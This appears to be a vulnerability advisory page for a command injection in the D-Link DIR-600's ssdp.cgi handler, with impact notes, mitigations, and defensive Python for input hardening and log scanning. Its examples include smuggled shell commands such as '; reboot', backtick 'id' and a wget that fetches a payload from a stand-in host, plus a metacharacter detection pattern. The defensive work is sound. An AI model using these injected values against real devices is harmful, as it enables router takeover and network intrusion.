CVE-2026-2163: Command Injection in D-Link DIR-600
A vulnerability was identified in D-Link DIR-600 up to 2.15WWb02. This vulnerability affects unknown code of the file ssdp.cgi. Such manipulation of the argument HTTP_ST/REMOTE_ADDR/REMOTE_PORT/SERVER_ID leads to command injection. The attack may be launched remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer.
AI Analysis
Technical Summary
CVE-2026-2163 is a medium-severity command injection vulnerability in the D-Link DIR-600 router firmware up to and including version 2.15WWb02. The flaw sits in the ssdp.cgi handler, where the values of HTTP_ST, REMOTE_ADDR, REMOTE_PORT or SERVER_ID reach an operating-system command without adequate sanitisation. Those names are the conventional CGI meta-variables a web server derives from the incoming request (HTTP_ST from the SSDP "ST" header, REMOTE_ADDR and REMOTE_PORT from the client connection), so the tainted data is request-controlled rather than something an administrator configures. A remote attacker can therefore send a specially crafted request that makes the handler execute injected commands; no user interaction is required. The CVSS 4.0 vector rates the issue as network-reachable (AV:N) with low attack complexity (AC:L) but with high privileges required (PR:H), meaning the attacker first needs authenticated or otherwise elevated access to the device. That prerequisite, together with low ratings for the confidentiality, integrity and availability impact, is why the overall score is medium despite arbitrary command execution. Note that PR:H describes what the attacker must already hold, not the privilege level of the injected command; the advisory does not state the latter. The DIR-600 is end-of-life, D-Link provides no patch, and public exploit code exists, so the practical risk for any unit still in service is higher than the score alone suggests. A compromised router can intercept traffic or serve as a foothold into the network behind it; replacement or strict network segmentation is the realistic remedy.
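The following is an added illustration of the bug class described above, not code from the DIR-600 firmware or from the advisory. The real ssdp.cgi source is not shown on this page, so the helper binary name, its flags and the way the four CGI variables are consumed are all assumptions; what the example shows is the difference between pasting request-derived variables into a shell command line and validating them, then passing them as an argument vector without a shell.

```python
import ipaddress
import re
import shlex

# Assumed for the example: the handler shells out to a helper binary with the four
# request-derived CGI variables as flags. Neither the binary nor the flags are from the page.
HELPER = "/usr/sbin/ssdp_notify"

# Allowlist for SSDP search targets and identifiers: ssdp:all, upnp:rootdevice,
# urn:schemas-upnp-org:device:InternetGatewayDevice:1, uuid:... and similar tokens.
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9:._-]{1,128}$")


def build_command_vulnerable(env: dict) -> str:
    """Vulnerable pattern: tainted values are concatenated into one shell command
    line, so HTTP_ST='ssdp:all; reboot' yields a second command for the shell."""
    return (
        f"{HELPER} -st {env.get('HTTP_ST', '')}"
        f" -addr {env.get('REMOTE_ADDR', '')} -port {env.get('REMOTE_PORT', '')}"
        f" -id {env.get('SERVER_ID', '')}"
    )


def validate_request_vars(env: dict) -> dict:
    """Allowlist every tainted variable before it comes near a command."""
    st = env.get("HTTP_ST", "")
    if not SAFE_TOKEN.match(st):
        raise ValueError(f"HTTP_ST rejected: {st!r}")
    addr = env.get("REMOTE_ADDR", "")
    try:
        ipaddress.ip_address(addr)  # accepts only a literal IPv4/IPv6 address
    except ValueError:
        raise ValueError(f"REMOTE_ADDR rejected: {addr!r}")
    port = env.get("REMOTE_PORT", "")
    if not (port.isascii() and port.isdigit() and 1 <= int(port) <= 65535):
        raise ValueError(f"REMOTE_PORT rejected: {port!r}")
    sid = env.get("SERVER_ID", "")
    if not SAFE_TOKEN.match(sid):
        raise ValueError(f"SERVER_ID rejected: {sid!r}")
    return {"HTTP_ST": st, "REMOTE_ADDR": addr, "REMOTE_PORT": port, "SERVER_ID": sid}


def build_argv_hardened(env: dict) -> list:
    """Hardened pattern: validate, then hand the helper an argument vector
    (subprocess.run(argv) with no shell), so metacharacters are never interpreted."""
    v = validate_request_vars(env)
    return [HELPER, "-st", v["HTTP_ST"], "-addr", v["REMOTE_ADDR"],
            "-port", v["REMOTE_PORT"], "-id", v["SERVER_ID"]]


def build_command_quoted(env: dict) -> str:
    """Second line of defence where a shell cannot be avoided: shlex.quote keeps
    each value a single argument even if the allowlist is ever bypassed."""
    parts = [HELPER, "-st", env.get("HTTP_ST", ""), "-addr", env.get("REMOTE_ADDR", ""),
             "-port", env.get("REMOTE_PORT", ""), "-id", env.get("SERVER_ID", "")]
    return " ".join(shlex.quote(p) for p in parts)


if __name__ == "__main__":
    # Constructed request environment carrying an injection in HTTP_ST.
    env = {"HTTP_ST": "ssdp:all; reboot", "REMOTE_ADDR": "192.0.2.1",
           "REMOTE_PORT": "1900", "SERVER_ID": "uuid:1234"}
    print("vulnerable :", build_command_vulnerable(env))
    print("quoted     :", build_command_quoted(env))
    try:
        build_argv_hardened(env)
    except ValueError as exc:
        print("hardened   : rejected ->", exc)
```

The argv form is the primary fix; the quoting helper is only a fallback because it still runs a shell, and quoting alone does nothing about a helper binary that itself misinterprets its arguments.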
Potential Impact
The direct impact of CVE-2026-2163 is command execution on the router itself, which hands an attacker control over the device's configuration and traffic handling. From there the usual router-compromise outcomes follow: DNS or routing changes that redirect clients, man-in-the-middle interception of unencrypted traffic, data exfiltration, and use of the device as a pivot for attacks on other systems on the LAN behind it. The CVSS rating is medium, largely because of the PR:H requirement, but public exploit code lowers the bar, and with no vendor fix available every DIR-600 still in service carries a known, exploitable and permanently unmitigated weakness. The exposure is greatest for home users and small to medium organisations, where legacy consumer routers of this kind often remain deployed without compensating controls.
Mitigation Recommendations
Because the device is end-of-life and no official patch will be issued, the first recommendation is to replace affected DIR-600 units with supported hardware that still receives security updates. Where immediate replacement is not possible, segment the router away from critical assets and sensitive data. Since ssdp.cgi belongs to the router's UPnP/SSDP function, disable UPnP where the firmware offers the option, and make sure that neither the SSDP service (UDP/1900) nor the web administration interface is reachable from the WAN side; on the LAN side, confine them to a management VLAN reachable only from trusted hosts. Add network-level controls (firewall rules and IDS/IPS signatures) that watch for requests to ssdp.cgi carrying shell metacharacters in the ST header or query string, and alert on any access to that handler from an unexpected source. Keep an inventory of network devices with their firmware versions so that end-of-life hardware and versions up to 2.15WWb02 can be identified, and audit it regularly. Finally, make administrators and users aware that legacy devices of this kind will never receive fixes, so the only durable remedy is a timely upgrade.
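The inventory and detection steps above can be scripted. The block below is an added example written for this page, not a tool from D-Link or from the advisory's source: it flags firmware versions in the affected range and scans request records for the patterns a defender would watch for. The firmware version layout, the log format and the log lines themselves are constructed for the example and are not real DIR-600 output; the trusted-network prefix is likewise an assumption.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumed firmware version layout (the page only names "2.15WWb02"):
#   <major>.<minor>[<region letters>][b<build>]   e.g. 2.15WWb02, 2.14WWb05, 2.13
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)([A-Za-z]*)(?:b(\d+))?$")
LAST_AFFECTED = (2, 15, 2)  # "up to 2.15WWb02"; the region code is ignored in the comparison

# Constructed record format for the example, one request per line:
#   <timestamp> <client ip> "<method> <path> <proto>" ST="<raw ST header>"
_LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>\S+) (?P<path>\S+) [^"]*" ST="(?P<st>.*)"$')
# Characters that let a value escape into a second shell command.
_SHELL_META = re.compile(r"[;&|`$\n\r]")

# Constructed sample records (not captured from a real device).
SAMPLE_LOG = [
    '2026-02-10T12:00:01Z 192.168.0.20 "GET /ssdp.cgi HTTP/1.1" ST="upnp:rootdevice"',
    '2026-02-10T12:00:05Z 203.0.113.7 "GET /ssdp.cgi HTTP/1.1" ST="ssdp:all;wget%20http://203.0.113.7/x%20-O%20/tmp/x"',
    '2026-02-10T12:00:09Z 192.168.0.20 "GET /ssdp.cgi HTTP/1.1" ST="urn:schemas-upnp-org:device:InternetGatewayDevice:1"',
    '2026-02-10T12:00:12Z 192.168.0.55 "GET /ssdp.cgi HTTP/1.1" ST="ssdp:all%60id%60"',
    '2026-02-10T12:00:15Z 198.51.100.9 "GET /index.html HTTP/1.1" ST=""',
    '2026-02-10T12:00:18Z 192.168.0.30 "GET /ssdp.cgi?id=uuid%3A1%7Cwget HTTP/1.1" ST="ssdp:all"',
]


def parse_firmware_version(version: str) -> tuple:
    """Return (major, minor, build); a version without a build number counts as build 0."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised firmware version: {version!r}")
    major, minor, _region, build = m.groups()
    return (int(major), int(minor), int(build) if build else 0)


def is_affected_firmware(version: str) -> bool:
    """True for every version up to and including 2.15WWb02."""
    return parse_firmware_version(version) <= LAST_AFFECTED


def find_injection_attempts(lines, trusted=("192.168.0.0/24",)) -> list:
    """Report ssdp.cgi requests whose ST header or query string carries shell
    metacharacters (after percent-decoding) or that come from outside the trusted nets."""
    nets = [ipaddress.ip_network(n) for n in trusted]
    findings = []
    for n, line in enumerate(lines, 1):
        m = _LOG_RE.match(line)
        if not m:
            continue  # malformed record; a production tool would count these
        path = unquote(m.group("path"))
        if "ssdp.cgi" not in path.lower():
            continue
        st = unquote(m.group("st"))
        reasons = []
        if _SHELL_META.search(st):
            reasons.append("shell metacharacters in ST")
        if _SHELL_META.search(path.partition("?")[2]):
            reasons.append("shell metacharacters in query string")
        try:
            src = ipaddress.ip_address(m.group("src"))
            if not any(src in net for net in nets):
                reasons.append("request from outside trusted network")
        except ValueError:
            reasons.append("unparseable source address")
        if reasons:
            findings.append({"line": n, "src": m.group("src"), "st": st, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for v in ("2.13", "2.14WWb05", "2.15WWb02", "2.15WWb03", "2.16WWb01"):
        print(f"{v:<10} affected={is_affected_firmware(v)}")
    for f in find_injection_attempts(SAMPLE_LOG):
        print(f"line {f['line']} from {f['src']}: {', '.join(f['reasons'])}")
```

Decoding before matching matters: an IDS rule that looks for a literal `;` in the request misses `%3B`, and the backtick and `$(` forms are as dangerous as the semicolon. Treat any ssdp.cgi request from outside the management network as a finding in its own right, since there is no legitimate reason for that handler to be reached from the WAN.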
Affected Countries
United States, India, Brazil, Russia, Germany, United Kingdom, Indonesia, Mexico, Philippines, Vietnam
Technical Details
- Data Version: 5.2
- Assigner Short Name: VulDB
- Date Reserved: 2026-02-07T09:06:36.248Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 6988c15b4b57a58fa1b5b391
Added to database: 2/8/2026, 5:01:15 PM
Last enriched: 2/23/2026, 9:39:24 PM
Last updated: 3/25/2026, 10:23:39 AM